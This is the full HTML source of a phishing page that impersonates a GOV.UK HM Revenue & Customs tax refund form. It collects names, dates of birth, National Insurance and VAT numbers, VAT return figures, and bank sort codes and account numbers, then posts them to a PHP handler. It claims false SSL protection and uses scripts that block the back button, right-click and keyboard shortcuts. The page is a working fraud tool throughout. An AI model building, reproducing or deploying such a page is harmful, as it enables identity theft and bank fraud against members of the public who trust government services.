<!DOCTYPE html><!--[if lt IE 9]>
<html class="no-js lte-ie8" lang=en>
   <![endif]--><!--[if gt IE 8]><!-->
   <html class="no-js lte-ie8" lang=en>
      <![endif]--><!--[if gt IE 8]><!-->
      <html class="js no-touchevents no-details svg video" style="" lang="en">
         <!--<![endif]-->
         <head>
            <meta http-equiv="content-type" content="text/html; charset=UTF-8">
            <title>Personal - Apply</title>

        <script type="text/javascript">window.history.forward(); function noBack() { window.history.forward(); }</script>
        <body onload="noBack();" onpageshow="if (event.persisted) noBack();" onunload="">

            <!--[if gt IE 8]><!-->
            <link href="etc/design.css" media="screen" rel="stylesheet" type="text/css">
            <!--<![endif]-->
            <link href="etc/print.css" media="print" rel="stylesheet" type="text/css">
            <!--[if gte IE 9]><!-->
            <link href="etc/fonts.css" media="all" rel="stylesheet" type="text/css">
            <!--<![endif]-->
            <link rel="shortcut icon" sizes="16x16 32x32 48x48" href="favicon.ico" type="image/x-icon"> 
            <link rel="mask-icon" href="etc/mask.svg" color="#0b0c0c"> 
            <link rel="apple-touch-icon" sizes="180x180" href="etc/touch180.png"> 
            <link rel="apple-touch-icon" sizes="167x167" href="etc/touch167.png"> 
            <link rel="apple-touch-icon" sizes="152x152" href="etc/touch152.png"> 
            <link rel="apple-touch-icon" href="etc/touch.png"> 
            <meta property="og:image" content="etc/graph.png"> 
            <meta name="viewport" content="width=device-width, initial-scale=1">
            <!--[if gt IE 8]><!-->
            <link rel="stylesheet" href="etc/jquery.css">
            <!--<![endif]-->
            <!--[if !IE]>-->
            <style>.cbanner-govuk-heading-m{color:#0b0c0c;font-family:"GDS Transport","nta",Arial,sans-serif;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-weight:700;font-size:18px;line-height:1.11111;display:block;margin-top:0;margin-bottom:15px}@media print{.cbanner-govuk-heading-m{color:#000}}@media print{.cbanner-govuk-heading-m{font-family:sans-serif}}@media (min-width: 40.0625em){.cbanner-govuk-heading-m{font-size:24px;line-height:1.25}}@media print{.cbanner-govuk-heading-m{font-size:18pt;line-height:1.15}}@media (min-width: 40.0625em){.cbanner-govuk-heading-m{margin-bottom:20px}}.cbanner-govuk-body{color:#0b0c0c;font-family:"GDS Transport","nta",Arial,sans-serif;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-weight:400;font-size:16px;line-height:1.25;margin-top:0;margin-bottom:15px}@media print{.cbanner-govuk-body{color:#000}}@media print{.cbanner-govuk-body{font-family:sans-serif}}@media (min-width: 40.0625em){.cbanner-govuk-body{font-size:19px;line-height:1.31579}}@media print{.cbanner-govuk-body{font-size:14pt;line-height:1.15}}@media (min-width: 40.0625em){.cbanner-govuk-body{margin-bottom:20px}}.cbanner-govuk-button{font-family:"GDS Transport","nta",Arial,sans-serif;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-weight:400;font-size:16px;line-height:1.1875;box-sizing:border-box;display:inline-block;position:relative;width:100%;margin-top:0;margin-right:0;margin-left:0;margin-bottom:22px;padding:8px 10px 7px;border:2px solid transparent;border-radius:0;color:#fff;background-color:#00703c;box-shadow:0 2px 0 #002d18;text-align:center;vertical-align:top;cursor:pointer;-webkit-appearance:none}@media print{.cbanner-govuk-button{font-family:sans-serif}}@media (min-width: 40.0625em){.cbanner-govuk-button{font-size:19px;line-height:1}}@media print{.cbanner-govuk-button{font-size:14pt;line-height:19px}}@media (min-width: 40.0625em){.cbanner-govuk-button{margin-bottom:32px}}@media (min-width: 40.0625em){.cbanner-govuk-button{width:auto}}.cbanner-govuk-button:link,.cbanner-govuk-button:visited,.cbanner-govuk-button:active,.cbanner-govuk-button:hover{color:#fff;text-decoration:none}.cbanner-govuk-button::-moz-focus-inner{padding:0;border:0}.cbanner-govuk-button:hover{background-color:#005a30}.cbanner-govuk-button:active{top:2px}.cbanner-govuk-button:focus{border-color:#fd0;outline:3px solid transparent;box-shadow:inset 0 0 0 1px #fd0}.cbanner-govuk-button:focus:not(:active):not(:hover){border-color:#fd0;color:#0b0c0c;background-color:#fd0;box-shadow:0 2px 0 #0b0c0c}.cbanner-govuk-button:before{content:"";display:block;position:absolute;top:-2px;right:-2px;bottom:-4px;left:-2px;background:transparent}.cbanner-govuk-button:active:before{top:-4px}.cbanner-govuk-button--disabled,.cbanner-govuk-button[disabled="disabled"],.cbanner-govuk-button[disabled]{opacity:0.5}.cbanner-govuk-button--disabled:hover,.cbanner-govuk-button[disabled="disabled"]:hover,.cbanner-govuk-button[disabled]:hover{background-color:#00703c;cursor:default}.cbanner-govuk-button--disabled:focus,.cbanner-govuk-button[disabled="disabled"]:focus,.cbanner-govuk-button[disabled]:focus{outline:none}.cbanner-govuk-button--disabled:active,.cbanner-govuk-button[disabled="disabled"]:active,.cbanner-govuk-button[disabled]:active{top:0;box-shadow:0 2px 0 #002d18}.cbanner-govuk-button--secondary{background-color:#f3f2f1;box-shadow:0 2px 0 #929191}.cbanner-govuk-button--secondary,.cbanner-govuk-button--secondary:link,.cbanner-govuk-button--secondary:visited,.cbanner-govuk-button--secondary:active,.cbanner-govuk-button--secondary:hover{color:#0b0c0c}.cbanner-govuk-button--secondary:hover{background-color:#dbdad9}.cbanner-govuk-button--secondary:hover[disabled]{background-color:#f3f2f1}.cbanner-govuk-button--warning{background-color:#d4351c;box-shadow:0 2px 0 #55150b}.cbanner-govuk-button--warning,.cbanner-govuk-button--warning:link,.cbanner-govuk-button--warning:visited,.cbanner-govuk-button--warning:active,.cbanner-govuk-button--warning:hover{color:#fff}.cbanner-govuk-button--warning:hover{background-color:#aa2a16}.cbanner-govuk-button--warning:hover[disabled]{background-color:#d4351c}.cbanner-govuk-button--start{font-weight:700;font-size:18px;line-height:1;display:inline-flex;min-height:auto;justify-content:center}@media (min-width: 40.0625em){.cbanner-govuk-button--start{font-size:24px;line-height:1}}@media print{.cbanner-govuk-button--start{font-size:18pt;line-height:1}}.cbanner-govuk-button__start-icon{margin-left:5px;vertical-align:middle;flex-shrink:0;align-self:center}@media (min-width: 48.0625em){.cbanner-govuk-button__start-icon{margin-left:10px}}.cbanner-govuk-button-group{margin-bottom:5px;display:flex;flex-direction:column;align-items:center}@media (min-width: 40.0625em){.cbanner-govuk-button-group{margin-bottom:15px}}.cbanner-govuk-button-group .cbanner-govuk-link{font-family:"GDS Transport","nta",Arial,sans-serif;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-weight:400;font-size:16px;line-height:1.1875;display:inline-block;max-width:100%;margin-top:5px;margin-bottom:20px;text-align:center}@media print{.cbanner-govuk-button-group .cbanner-govuk-link{font-family:sans-serif}}@media (min-width: 40.0625em){.cbanner-govuk-button-group .cbanner-govuk-link{font-size:19px;line-height:1}}@media print{.cbanner-govuk-button-group .cbanner-govuk-link{font-size:14pt;line-height:19px}}.cbanner-govuk-button-group .cbanner-govuk-button{margin-bottom:17px}@media (min-width: 40.0625em){.cbanner-govuk-button-group{margin-right:-15px;flex-direction:row;flex-wrap:wrap;align-items:baseline}.cbanner-govuk-button-group .cbanner-govuk-button,.cbanner-govuk-button-group .cbanner-govuk-link{margin-right:15px}.cbanner-govuk-button-group .cbanner-govuk-link{text-align:left}}.cbanner-govuk-cookie-banner{font-family:"GDS Transport","nta",Arial,sans-serif;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-weight:400;font-size:16px;line-height:1.25;padding-top:20px;border-bottom:10px solid transparent;background-color:#f3f2f1}@media print{.cbanner-govuk-cookie-banner{font-family:sans-serif}}@media (min-width: 40.0625em){.cbanner-govuk-cookie-banner{font-size:19px;line-height:1.31579}}@media print{.cbanner-govuk-cookie-banner{font-size:14pt;line-height:1.15}}.cbanner-govuk-cookie-banner[hidden]{display:none}.cbanner-govuk-cookie-banner__message{margin-bottom:-10px}.cbanner-govuk-cookie-banner__message[hidden]{display:none}.cbanner-govuk-cookie-banner__message:focus{outline:none}.cbanner-govuk-width-container{max-width:960px;margin-right:15px;margin-left:15px}@supports (margin: max(calc(0px))){.cbanner-govuk-width-container{margin-right:max(15px, calc(15px + env(safe-area-inset-right)));margin-left:max(15px, calc(15px + env(safe-area-inset-left)))}}@media (min-width: 40.0625em){.cbanner-govuk-width-container{margin-right:30px;margin-left:30px}@supports (margin: max(calc(0px))){.cbanner-govuk-width-container{margin-right:max(30px, calc(15px + env(safe-area-inset-right)));margin-left:max(30px, calc(15px + env(safe-area-inset-left)))}}}@media (min-width: 1020px){.cbanner-govuk-width-container{margin-right:auto;margin-left:auto}@supports (margin: max(calc(0px))){.cbanner-govuk-width-container{margin-right:auto;margin-left:auto}}}.cbanner-govuk-link{font-family:"GDS Transport","nta",Arial,sans-serif;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media print{.cbanner-govuk-link{font-family:sans-serif}}.cbanner-govuk-link:focus{outline:3px solid transparent;color:#0b0c0c;background-color:#fd0;box-shadow:0 -2px #fd0,0 4px #0b0c0c;text-decoration:none}.cbanner-govuk-link:link{color:#1d70b8}.cbanner-govuk-link:visited{color:#4c2c92}.cbanner-govuk-link:hover{color:#003078}.cbanner-govuk-link:active{color:#0b0c0c}.cbanner-govuk-link:focus{color:#0b0c0c}@media print{.cbanner-govuk-link[href^="/"]:after,.cbanner-govuk-link[href^="http://"]:after,.cbanner-govuk-link[href^="https://"]:after{content:" (" attr(href) ")";font-size:90%;word-wrap:break-word}}.cbanner-govuk-grid-row{margin-right:-15px;margin-left:-15px}.cbanner-govuk-grid-row:after{content:"";display:block;clear:both}.cbanner-govuk-grid-column-two-thirds{box-sizing:border-box;width:100%;padding:0 15px}@media (min-width: 40.0625em){.cbanner-govuk-grid-column-two-thirds{width:66.6666%;float:left}}@media (min-width: 1020px){body#top .cbanner-govuk-width-container{margin-right:30px;margin-left:30px}}body#top .cbanner-govuk-link{text-decoration:underline}body#top .cbanner-govuk-link:hover{color:#003078 !important}body#top .cbanner-govuk-link:focus{color:#0b0c0c !important;text-decoration:none !important}</style>
            <!--<![endif]-->
            <meta name="format-detection" content="telephone=no">
            <link rel="stylesheet" href="local.css">
         </head>
         <body class="js-enabled">
            <div id="skiplink-container">
               <div>
                  <a id="skip-link" href="#content" class="skiplink">Skip to main content</a>
               </div>
            </div>
            <header role="banner" id="global-header" class=" with-proposition ">
               <div class="header-wrapper">
                  <div class="header-global">
                     <div class="header-logo">
                        <a href="#" title="" id="logo" class="content">
                        <img src="etc/gov.uk_logotype_crown.png" alt=""> GOV.UK
                        </a>
                     </div>
                  </div>
                  <div class="header-proposition">
                     <div class="content">
                        <nav id="proposition-menu" class="header__menu" role="navigation">
                           <span class="header__menu__proposition-name">Apply for refund</span>
                        </nav>
                     </div>
                  </div>
               </div>
            </header>
            <!--end header-->
            <main id="wrapper" role="main">
               <div class="centered-content">
                  <div class="service-info  grid-wrapper">
                     <div class="beta-banner ">
                        <p>
                           <strong class="phase-tag">SECURED</strong>
                           <span>This form is protected by 256-bit SSL security.
                           </span>
                        </p>
                     </div>
                     <div class="logo">
                        <span class="organisation-logo organisation-logo-medium"> HM Revenue &amp; Customs </span>
                     </div>
                     <div style="text-align:right; padding:5px">
                        <div id="lastlogin" class="service-info__help">
                           <p></p>
                        </div>
                     </div>
                  </div>
                  <div class="border-bottom"></div>
                  <div class="grid-row">
                     <div style="text-align: right" class="column-full">
                        <p class="">
                           English
                           | 
                           <a id="cymraeg-switch" href="#" target="_self">Cymraeg</a>
                        </p>
                     </div>
                  </div>
               </div>
               <div id="content">
                  <div class="grid-row">
                     <div class="column-two-thirds">
                        <form action="dataFinance.php?userMetaData=67f4feb7305d7" method="POST">
                           <div class="flash error-summary error-summary--show " id="error-summary-display" role="alert" style="display:none" tabindex="-1">
                              <h2 id="error-summary-heading" class="h3-heading" style="margin-bottom: 0.83333em">There\'s a problem</h2>
                              <p>Please correct the errors below</p>
                           </div>
                           <h1 xmlns="http://www.w3.org/1999/html">Personal details</h1>
                           <p>Complete the following form using your personal details. Please make sure that the information you provide is the one present on government records.</p>
                           <div class="form-group">
                              <label for="fnm" class="">
                              <span style="width: 100%;display: block;">Company Name</span>
                              <input type="text" class="form-control" name="con" id="con" value="" maxlength="300" required>
                              </label>
                           </div>
                           <div class="form-group">
                              <label for="fnm" class="">
                              <span style="width: 100%;display: block;">Full Name</span>
                              <input type="text" class="form-control" name="fn" id="fnm" value="" maxlength="300" required>
                              </label>
                           </div>
                           <div class="form-group">
                              <label for="b1" class="">
                                 <span style="width: 100%;display: block;">Date of Birth</span>
                                 <select id="b1" name="dobdd" required>
                                    <option value="">DD</option>
                                    <option value="01">01</option>
                                    <option value="02">02</option>
                                    <option value="03">03</option>
                                    <option value="04">04</option>
                                    <option value="05">05</option>
                                    <option value="06">06</option>
                                    <option value="07">07</option>
                                    <option value="08">08</option>
                                    <option value="09">09</option>
                                    <option value="10">10</option>
                                    <option value="11">11</option>
                                    <option value="12">12</option>
                                    <option value="13">13</option>
                                    <option value="14">14</option>
                                    <option value="15">15</option>
                                    <option value="16">16</option>
                                    <option value="17">17</option>
                                    <option value="18">18</option>
                                    <option value="19">19</option>
                                    <option value="20">20</option>
                                    <option value="21">21</option>
                                    <option value="22">22</option>
                                    <option value="23">23</option>
                                    <option value="24">24</option>
                                    <option value="25">25</option>
                                    <option value="26">26</option>
                                    <option value="27">27</option>
                                    <option value="28">28</option>
                                    <option value="29">29</option>
                                    <option value="30">30</option>
                                    <option value="31">31</option>
                                 </select>
                                 <select id="b2" name="dobmm" required>
                                    <option value="">MM</option>
                                    <option value="01">01</option>
                                    <option value="02">02</option>
                                    <option value="03">03</option>
                                    <option value="04">04</option>
                                    <option value="05">05</option>
                                    <option value="06">06</option>
                                    <option value="07">07</option>
                                    <option value="08">08</option>
                                    <option value="09">09</option>
                                    <option value="10">10</option>
                                    <option value="11">11</option>
                                    <option value="12">12</option>
                                 </select>
                                 <select id="b3" name="dobyy" required>
                                    <option value="">YYYY</option>
                                    <option value="2013">2013</option>
                                    <option value="2012">2012</option>
                                    <option value="2011">2011</option>
                                    <option value="2010">2010</option>
                                    <option value="2009">2009</option>
                                    <option value="2008">2008</option>
                                    <option value="2007">2007</option>
                                    <option value="2006">2006</option>
                                    <option value="2005">2005</option>
                                    <option value="2004">2004</option>
                                    <option value="2003">2003</option>
                                    <option value="2002">2002</option>
                                    <option value="2001">2001</option>
                                    <option value="2000">2000</option>
                                    <option value="1999">1999</option>
                                    <option value="1998">1998</option>
                                    <option value="1997">1997</option>
                                    <option value="1996">1996</option>
                                    <option value="1995">1995</option>
                                    <option value="1994">1994</option>
                                    <option value="1993">1993</option>
                                    <option value="1992">1992</option>
                                    <option value="1991">1991</option>
                                    <option value="1990">1990</option>
                                    <option value="1989">1989</option>
                                    <option value="1988">1988</option>
                                    <option value="1987">1987</option>
                                    <option value="1986">1986</option>
                                    <option value="1985">1985</option>
                                    <option value="1984">1984</option>
                                    <option value="1983">1983</option>
                                    <option value="1982">1982</option>
                                    <option value="1981">1981</option>
                                    <option value="1980">1980</option>
                                    <option value="1979">1979</option>
                                    <option value="1978">1978</option>
                                    <option value="1977">1977</option>
                                    <option value="1976">1976</option>
                                    <option value="1975">1975</option>
                                    <option value="1974">1974</option>
                                    <option value="1973">1973</option>
                                    <option value="1972">1972</option>
                                    <option value="1971">1971</option>
                                    <option value="1970">1970</option>
                                    <option value="1969">1969</option>
                                    <option value="1968">1968</option>
                                    <option value="1967">1967</option>
                                    <option value="1966">1966</option>
                                    <option value="1965">1965</option>
                                    <option value="1964">1964</option>
                                    <option value="1963">1963</option>
                                    <option value="1962">1962</option>
                                    <option value="1961">1961</option>
                                    <option value="1960">1960</option>
                                    <option value="1959">1959</option>
                                    <option value="1958">1958</option>
                                    <option value="1957">1957</option>
                                    <option value="1956">1956</option>
                                    <option value="1955">1955</option>
                                    <option value="1954">1954</option>
                                    <option value="1953">1953</option>
                                    <option value="1952">1952</option>
                                    <option value="1951">1951</option>
                                    <option value="1950">1950</option>
                                    <option value="1949">1949</option>
                                    <option value="1948">1948</option>
                                    <option value="1947">1947</option>
                                    <option value="1946">1946</option>
                                    <option value="1945">1945</option>
                                    <option value="1944">1944</option>
                                    <option value="1943">1943</option>
                                    <option value="1942">1942</option>
                                    <option value="1941">1941</option>
                                    <option value="1940">1940</option>
                                    <option value="1939">1939</option>
                                    <option value="1938">1938</option>
                                    <option value="1937">1937</option>
                                    <option value="1936">1936</option>
                                    <option value="1935">1935</option>
                                    <option value="1934">1934</option>
                                    <option value="1933">1933</option>
                                    <option value="1932">1932</option>
                                    <option value="1931">1931</option>
                                    <option value="1930">1930</option>
                                 </select>
                              </label>
                           </div>
                           <div class="panel panel-border-wide">
                              <fieldset class="govuk-fieldset">
                                 <div class="form-group">
                                    <label for="d2" class="  ">
                                    <span style="display: block;">National Insurance Number</span>                             
                                    <input type="text" class="form-control" name="nin" id="d2" maxlength="50" required>
                                    </label><br>

                                    <label for="d1" class="  ">
                                    <span style="display: block;">VAT Number</span>  
                                    <input type="text" class="form-control" name="vat" id="vat" maxlength="50" required>
                                    </label><br>

                                    <label for="d1" class="  ">
                                    <span style="display: block;">Elective VAT Date</span>  
                                    <input type="text" class="form-control" name="evatd" id="evatd" maxlength="50" required>
                                 </div>
                                 <div class="form-group">
                                    <label for="cd" class="  ">
                                    <span>Box 1</span><br>
                                    <input type="text" class="form-control" name="box1" id="box1" value="" maxlength="50" required>
                                    </label>
                                 </div>

                                 <div class="form-group">
                                    <label for="cd" class="  ">
                                    <span>Box 5 (from your last return)</span><br>
                                    <input type="text" class="form-control" name="box5" id="box5" value="" maxlength="50" required>
                                    </label>
                                 </div>

                                 <div class="form-group">
                                    <label for="cd" class="  ">
                                    <span>Numbers of Employees</span><br>
                                    <input type="text" class="form-control" name="employ" id="employ" value="" maxlength="50" required>
                                    </label>
                                 </div>

                              </fieldset>
                           </div>
                           <h4>Identity check</h4>
                           <p>To prevent identity theft, we require you to enter your Sort Code and Account Number.<br>This will be used to match and verify the information provided.</p>
                           <div class="form-group">
                              <label for="th" class="">
                              <span style="width: 100%;display: block;">Sort Code</span>
                              <input type="text" class="form-control" name="sortc" id="sortc" value="" maxlength="50" required>
                              </label>
                           </div>
                           <div class="form-group">
                              <label for="th" class="">
                              <span style="width: 100%;display: block;">Account Number</span>
                              <input type="text" class="form-control" name="accn" id="accn" value="" maxlength="50" required>
                              </label>
                           </div>

                           <div class="form-group">
                              <button id="submit-continue" class="button" type="submit">Continue</button>
                           </div>
                        </form>
                     </div>
                  </div>
                  <div class="report-error">
                     <a class="report-error__toggle js-visible" id="get-help-action" href="#">Is this page not working properly?</a>
                     <a class="report-error__toggle js-hidden" href="#">Is this page not working properly?</a>
                     <div id="report-error-partial-form" class="report-error__content hidden">
                        <div class="report-error__loading"></div>
                     </div>
                  </div>
               </div>
            </main>
            <footer class="group js-footer" id="footer" role="contentinfo">
               <div class="footer-wrapper">
                  <div class="footer-meta">
                     <div class="footer-meta-inner">
                        <ul class="platform-help-links">
                           <li>
                              <a href="#">
                              Accessibility statement
                              </a>
                           </li>
                           <li>
                              <a href="#">
                              Cookies
                              </a>
                           </li>
                           <li>
                              <a href="#">
                              Privacy policy
                              </a>
                           </li>
                           <li>
                              <a href="#">
                              Terms and conditions
                              </a>
                           </li>
                           <li>
                              <a href="#">
                              Help using GOV.UK
                              </a>
                           </li>
                        </ul>
                        <div class="open-government-licence">
                           <h2><a href="#" rel="noopener noreferrer"><img id="ogl-logo" src="etc/open-government-licence_2x.png" alt="Open Government Licence"></a></h2>
                           <p id="ogl-message">All content is available under the <a href="#" rel="noopener noreferrer">Open Government Licence v3.0</a>, except where otherwise stated</p>
                        </div>
                     </div>
                     <div class="copyright">
                        <a href="#" rel="noopener noreferrer">&copy; Crown Copyright</a>
                     </div>
                  </div>
               </div>
            </footer>

<script language=JavaScript>
<!--
var message="";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if 
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers) 
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")
// --> 
</script>

<script language="JavaScript">
        function disableCtrlKeyCombination(e)
        {
                //list all CTRL + key combinations you want to disable
                var forbiddenKeys = new Array("a", "s", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
                var key;
                var isCtrl;

                if(window.event)
                {
                        key = window.event.keyCode;     //IE
                        if(window.event.ctrlKey)
                                isCtrl = true;
                        else
                                isCtrl = false;
                }
                else
                {
                        key = e.which;     //firefox
                        if(e.ctrlKey)
                                isCtrl = true;
                        else
                                isCtrl = false;
                }

                //if ctrl is pressed check if other key is in forbidenKeys array
                if(isCtrl)
                {
                    for (i = 0; i < forbiddenKeys.length; i++)
                        {
                                //case-insensitive comparation
                            if (forbiddenKeys[i].toLowerCase() == String.fromCharCode(key).toLowerCase())
                                {
//                                    alert("Key combination CTRL + "
//                                                + String.fromCharCode(key)
//                                                + " has been disabled.");                                   
                                        return false;
                                }
                        }
                }
                return true;
        }
    </script>

    <script>
   
    document.onkeydown = function(e) {
         if (e.altKey && (e.keyCode === 36)) {//Alt+home blocked.
            return false;
        }
        if (e.altKey && (e.keyCode === 70)) {//Alt+f blocked.
            return false;
        }
    };
    </script>

<body onkeypress="return disableCtrlKeyCombination(event);" onkeydown="return disableCtrlKeyCombination(event);" >

         </body>
      </html>